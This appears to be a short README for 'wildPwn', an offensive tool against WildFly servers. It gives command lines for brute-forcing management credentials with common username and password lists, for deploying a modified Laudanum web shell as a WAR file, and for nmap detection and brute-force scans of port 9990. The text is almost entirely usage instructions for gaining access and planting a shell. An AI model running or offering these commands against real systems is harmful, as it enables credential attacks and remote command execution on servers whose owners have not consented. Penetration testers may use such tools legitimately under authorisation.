It is a tool for WildFly. Tool can be used to brute force or shell deploy. wildPwn.war contains modified Laudanum Shell. userList.txt contains common usernames and passList.txt contains common passwords.
- Original project by hlldz
- Python 3 version by Vincent Yiu (@vysecurity) - SYON Security
Bruteforce
python3 wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
Shell Deploy
python3 wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>
https://artofpwn.com/wildfly-exploitation.html
Detection
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>